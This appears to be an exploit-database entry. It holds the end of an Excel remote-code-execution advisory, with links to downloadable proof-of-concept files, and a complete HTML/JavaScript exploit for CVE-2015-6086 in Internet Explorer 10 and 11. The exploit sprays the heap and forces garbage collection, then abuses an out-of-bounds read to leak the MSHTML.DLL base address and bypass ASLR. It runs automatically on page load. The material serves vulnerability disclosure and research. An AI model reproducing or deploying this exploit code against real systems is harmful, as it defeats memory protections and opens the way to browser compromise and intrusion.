Microsoft Excel is a spreadsheet developed by Microsoft for Windows, Mac OS X, and iOS. It features calculation, graphing tools, pivot tables, and a macro programming language called Visual Basic for Applications. It has been a very widely applied spreadsheet for these platforms, especially since version 5 in 1993, and it has replaced Lotus 1-2-3 as the industry standard for spreadsheets. Excel forms part of Microsoft Office.
(https://en.wikipedia.org/wiki/Microsoft_Excel)
#######################################################################################
===================
Report Timeline:
===================
2016-02-06: Sébastien Morin from COSIG report the vulnerability to MSRC.
2016-02-16: MSRC confirm the vulnerability.
2016-04-12: Microsoft fixed the issue (MS16-042).
2016-04-13: Advisory released.
#######################################################################################
===================
Technical details:
===================
This vulnerability could allow remote code execution if a user opens a specially crafted Microsoft Office file (.xlsm). An attacker who successfully exploited the vulnerabilities could run arbitrary code in the context of the current user.
#######################################################################################
==========
POC:
==========
https://smsecurity.net/wp-content/uploads/2016/04/Microsoft_Office_Excel_Out-of-Bounds_Read_RCE.xlsm
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39694.zip
#######################################################################################

264
platforms/windows/remote/39698.html Executable file
View file

@ -0,0 +1,264 @@
<!--
CVE-2015-6086
Out Of Bound Read Vulnerability
Address Space Layout Randomization (ASLR) Bypass
Improper handling of new line and white space character caused
Out of Bound Read in CDOMStringDataList::InitFromString. This
flaw can be used to leak the base address of MSHTML.DLL and
effectively bypass Address Space Layout Randomization.
Affected Version:
Internet Explorer 9
Internet Explorer 10
Internet Explorer 11
Test Bed:
IE: 10 & 11
KB: KB3087038
OS: Windows 7 SP1 x86
Advisory:
http://www.payatu.com/advisory-ie_cdomstringdatalist/
https://technet.microsoft.com/library/security/MS15-112
http://www.zerodayinitiative.com/advisories/ZDI-15-547/
Copyright 2016 © Payatu Technologies Pvt. Ltd.
Author: Ashfaq Ansari
Email: ashfaq[at]payatu[dot]com
Websites: www.payatu.com
www.nullcon.net
www.hardwear.io
www.null.co.in
This program is free software: you can redistribute it and/or modify it
under the terms of the GNU General Public License as published by the
Free Software Foundation, either version 3 of the License, or (at your
option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with
this program. If not, see <http://www.gnu.org/licenses/>.
THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
-->
<!DOCTYPE html>
<html>
<head>
<title>IE 10-11 Windows 7 SP1 x86 - OOB Read ALSR Bypass PoC</title>
<meta http-equiv="pragma" content="no-cache"/>
<meta http-equiv="expires" content="0"/>
<script type="text/javascript">
/**
* This function is used to create string of desired size.
*
* @param character
* @param size
* @returns {string}
*/
function createString(character, size) {
while (character.length < size) {
character += character;
}
// BSTR structure
// header | unicode string | NULL terminator
// 4 bytes | sizeof(string) * 2 | 2 bytes
return character.substr(0, (size - 6) / 2);
}
/**
* This function is used to get the Internet Explorer's version.
*
* @link http://stackoverflow.com/questions/19999388/jquery-check-if-user-is-using-ie
* @returns {int | null}
*/
function getInternetExplorerVersion() {
var userAgent = window.navigator.userAgent;
var msie = userAgent.indexOf('MSIE');
if (msie > 0) {
return parseInt(userAgent.substring(msie + 5, userAgent.indexOf('.', msie)), 10);
}
var trident = userAgent.indexOf('Trident/');
if (trident > 0) {
var rv = userAgent.indexOf('rv:');
return parseInt(userAgent.substring(rv + 3, userAgent.indexOf('.', rv)), 10);
}
var edge = userAgent.indexOf('Edge/');
if (edge > 0) {
return parseInt(userAgent.substring(edge + 5, userAgent.indexOf('.', edge)), 10);
}
return null;
}
/**
* This function is used to leak the base address of MSHTML.DLL.
*
* @param offsetOfMSHTMLBaseAddress
*/
function LeakMSHTMLBaseAddress(offsetOfMSHTMLBaseAddress) {
// Step 1: Let's do some clean up
CollectGarbage();
var eventArray = new Array();
var polyLineArray = new Array();
var exploitSuccessful = false;
// Step 2: As the target object is stored in Process Heap
// instead of Isolated Heap, we can use any element that
// is stored on Process Heap to spray the Heap.
//
// To create a predictable pattern on Heap, we spray using
// "MsGestureEvent" and it's size is 0x0A0. We will use
// this object to read the VFTable pointer.
for (var i = 0; i < 0x1000; i++) {
eventArray[i] = document.createEvent('MsGestureEvent');
}
// Step 3: Now we need to create a hole in the allocation
// that we made earlier. The purpose of this hole is to
// allocate the vulnerable buffer just before the Heap
// chunk of "MsGestureEvent"
for (i = 1; i < 0x500; i += 2) {
eventArray[i] = null;
}
// Step 4: As Memory Protector is enabled by default on all
// versions of IE, it will not allow the free of objects
// instantly. So, we need to force free the memory due to
// Delayed Frees.
CollectGarbage2();
// Step 5: Now, fill the hole that we created earlier. The
// "requiredFeatures" property is allocated on OLEAUT32 Cache
// Heap, old Plunger technique does not seems to work for me.
// I have used a neat trick to bypass OLEAUT32 Cache Heap.
for (i = 0; i < 0x250; i++) {
polyLineArray[i] = document.createElementNS('http://www.w3.org/2000/svg', 'polyline');
// Step 6: Trick to bypass allocation on OLEAUT32 Cached Heap
polyLineArray[i].setAttributeNS(null, 'attrib' + i, createString('A', 0x0A0));
// Step 7: Now, "requiredFeatures" property won't be allocated on OLEAUT32 Cache Heap.
polyLineArray[i].setAttributeNS(null, 'requiredFeatures', createString('\n', 0x0A0));
// Step 8: As the whole exploitation depends on certain Heap
// layout, thus, this is unreliable. But to overcome this
// un-reliability, I'm reloading the page until, right Heap
// Layout is achieved.
//
// This PoC is created for the vendor to acknowledge this bug,
// hence reliability is not my concern at this moment. We can
// make it more reliable, but let's leave it for later stage.
//
// Some heuristics to detect if Heap is in the right state.
// Once we have determined the Heap state, we can apply some
// more heuristics.
if (polyLineArray[i].requiredFeatures.numberOfItems == 2 && polyLineArray[i].requiredFeatures.getItem(1).length == 4) {
// Step 9: Read the Out of Bound memory
var OOBReadMemory = escape(polyLineArray[i].requiredFeatures.getItem(1));
// Step 10: Some more heuristics
var spitValue = OOBReadMemory.split('%');
var CDOMMSGestureEvent_VFTablePointer = parseInt('0x' + spitValue[3].replace('u', '') + spitValue[2].replace('u', ''));
var MSHTMLBaseAddress = CDOMMSGestureEvent_VFTablePointer - offsetOfMSHTMLBaseAddress;
// Step 11: Show the message to user
var message = 'MSHTML.DLL Base Address: 0x' + MSHTMLBaseAddress.toString(16);
message += '\n';
message += 'CDOMMSGestureEvent VFTable Pointer: 0x' + CDOMMSGestureEvent_VFTablePointer.toString(16);
alert(message);
// Step 12: Exploit successful
exploitSuccessful = true;
break;
}
}
// Step 13: As stated earlier, this is a bit unreliable.
// If the exploit has failed, reload the current page.
// If reloading does not help, close the browser and
// launch the exploit multiple times.
if (!exploitSuccessful) {
window.location.reload();
}
}
/**
* This function is used fill the wait list of the freed objects
* and trigger Garbage Collection.
*/
function CollectGarbage2() {
// Microsoft implemented Memory Protector to mitigate
// Use after Free vulnerabilities. The object protected
// by Memory Protector won't be freed directly. Instead,
// it will be put into a wait list which will be freed
// when it reaches certain threshold (i.e 100,000 bytes).
var video = new Array();
// Now allocate video element (400 bytes) 250 times
//
// Note: We are not using stack to store the references.
// If we use stack to store the references, the memory
// will never be freed during Mark and Reclaim operation
for (var i = 0; i < 250; i++) {
video[i] = document.createElement('video');
}
// Now free the elements. It will be put into the wait list.
video = null;
// Reclaim the memory by triggering Garbage Collection
CollectGarbage();
}
/**
* This function is used to launch the exploitation by leaking
* the base address of MSHTML.DLL.
*/
function LaunchExploit() {
var browserSupported = false;
var ieVersion = getInternetExplorerVersion();
var offsetOfMSHTMLBaseAddress = null;
if (ieVersion == 11) {
// If you are getting a wrong base address, please update this value
// offsetOfMSHTMLBaseAddress = VFTableAddress - MSHTMLBaseAddress
offsetOfMSHTMLBaseAddress = 0x0002ebe8;
browserSupported = true;
} else if (ieVersion == 10) {
// If you are getting a wrong base address, please update this value
// offsetOfMSHTMLBaseAddress = VFTableAddress - MSHTMLBaseAddress
offsetOfMSHTMLBaseAddress = 0x0000d270;
browserSupported = true;
} else {
alert('Current browser is not supported!\nExploit Tested on IE10 & 11 (Windows 7 SP1 x86)');
}
// Launch the exploit
if (browserSupported) {
LeakMSHTMLBaseAddress(offsetOfMSHTMLBaseAddress);
}
}
</script>
</head>
<body onload='LaunchExploit();'>
</body>
</html>